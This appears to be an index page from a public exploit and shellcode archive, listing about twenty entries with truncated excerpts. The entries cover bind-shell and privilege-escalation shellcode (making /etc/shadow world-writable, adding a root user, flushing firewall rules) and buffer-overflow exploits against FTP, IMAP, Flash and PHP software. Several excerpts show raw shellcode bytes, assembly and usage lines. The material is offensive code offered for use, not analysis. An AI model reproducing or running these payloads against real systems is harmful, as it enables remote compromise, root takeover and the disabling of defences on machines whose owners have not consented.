BSD x86 portbind + fork shellcode (111 bytes)

No description provided by source. / -------------- FreeBSD/x86 - portbind shell + fork 111 bytes-------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : [email protected] / include stdio.h include string.h include arpa/inet.h char shellcode =...

freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes

No description provided by source. / FreeBSD shellcode chown/tmp/sh, 0, 0; chmod/tmp/sh, 06755; 44 bytes Claes M. Nyberg 20020209 [email protected], [email protected] / / void mainvoid asm xor %eax, %eax eax = 0 pushl %eax string ends with NULL pushl $0x68732f2f push 'hs//' //sh pushl...

IBM AIX 4.3.x/5.1 ERRPT Local Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5885/info The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges...

linux/ppc read & exec shellcode 32 bytes

No description provided by source. / readnexecppc-core.c by Charles Stevenson [email protected] / char hellcode = / read0,stack,1028; stack; linux/ppc by core / \x7c\x63\x1a\x79 / xor. r3,r3,r3 / \x38\xa0\x04\x04 / li r5,1028 / \x30\x05\xfb\xff / addic r0,r5,-1025 / \x7c\x24\x0b\x78 / mr r4,r1 /...

Adobe Flash Player < 10.1.53 .64 Action Script Type Confusion Exploit (DEP+ASLR bypass)

No description provided by source. Source: http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/ Adobe Flash player Action script type confusion exploit DEP+ASLR bypass advisory text : Here is another reliable windows 7 exploit . the main method used for exploitation is...

Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF

No description provided by source. !/usr/bin/perl Mini-stream RM-MP3 Converter Version 3.0.0.7 .pls Universal Stack Overflow Exploit Author: mat Mail: [email protected] my $shellcode = \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49...

linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes

No description provided by source. / Title : Linux/x86 - Shellcode Polymorphic chmod/etc/shadow,666 & exit - 54 bytes Encode : ADD Author : Jonathan Salwan Mail : submit ! shell-storm.org ! Database of shellcodes = http://www.shell-storm.org/shellcode/ Informations chmod & exit:...

CodeBlue 5.1 SMTP Response Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5300/info CodeBlue is an Apache httpd log scanning utility that attempts to contact the administrators of hosts infected with worms. A buffer overflow vulnerability has been reported in CodeBlue. The condition occurs when...

Novell eDirectory 8.x iMonitor HTTPSTK Buffer Overflow Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. An...

MailEnable Mail Server IMAP <= 1.52 Remote Buffer Overflow Exploit

No description provided by source. / MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4 Homepage : www.mailenable.com Affected versions: Pro v1.52 Enterprise v1.01 Bug discovery : Nima Majidi at www.hat-squad.com Exploit code : class101 at www.hat-squad.com & dfind.kd-team.com Fix :...

FuzeZip 1.0.0.131625 - SEH Buffer Overflow

No description provided by source. !/usr/bin/python Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0 Date: 16.Apr.2013 Vulnerability reported Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://fuzezip.com/...

Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes

No description provided by source. / Title: Linux/x86-64 - setuid0 & chmod /etc/passwd, 0777 & exit0 - 63 bytes Date: 2010-06-17 Tested: Archlinux x8664 k2.6.33 Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes...

linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes

No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve/bin/sh,0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode=\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46 \x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68...

linux/x86 bindport 8000 & add user with root access 225+ bytes

No description provided by source. ; ; Title : Bindport TCP/8000 & execve add user with access root ; os : Linux x86 ; size : 225+ bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ...

Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit

No description provided by source. GoldenFTP 4.70 PASS Exploit Authors: Craig Freyman cd1zz and Gerardo Iglesias Galvan iglesiasgg Tested on XP SP3 Vendor Contacted: 1/17/2011 no response For this exploit to work correctly, you need to know the subnet that the server is running on. You also need ...

Serial port shell binding, busybox Launching shellcode

No description provided by source. / General: Serial port shell binding, busybox launching shellcode.. yey! Specific: really wish i could tell you what i needed this for.. but meh.. this will bind a busybox sh shell to /dev/ttyS0, the shellcode does not alter the baudrate settings.. 9600 is the...

FreeFloat FTP Server 1.0 - REST, PASV Buffer Overflow Exploit

No description provided by source. !/usr/bin/python +Exploit Title: FreeFloat FTP Server REST and PASV Buffer Overflow Exploit +Date: 18\06\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.freefloat.com/software/freefloatftpserver.zip +Version: 1.00 +Tested On: Windows XP SP3 Brazilian...

Prozilla 1.3.6 - Remote Stack Overflow Exploit

No description provided by source. / 20/10/2004 This is a private work of Serkan Akpolat [email protected] for the unpublished prozilla-1.3.6 format string/buffer overflow vulnerability , though this version only exploits the stack overflow. Tested against current gentoo/slack/debian/suse wi...

PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit

No description provided by source. / Remote exploit for the php memorylimit vulnerability found by Stefan Esser in php 4 = 4.3.7 and php 5 = 5.0.0RC3. by Gyan Chawdhary [email protected] felinemenace.org/gyan Greets S.Esser for the vuln and mlxdebug.tgz, everything in the code is based on it...

linux/x86 bindport 8000 & execve iptables -F 176 bytes

No description provided by source. ; ; Title : Bindport TCP/8000 & execve iptables -F ; os : Linux x86 ; size : 176 bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ; More shellcod...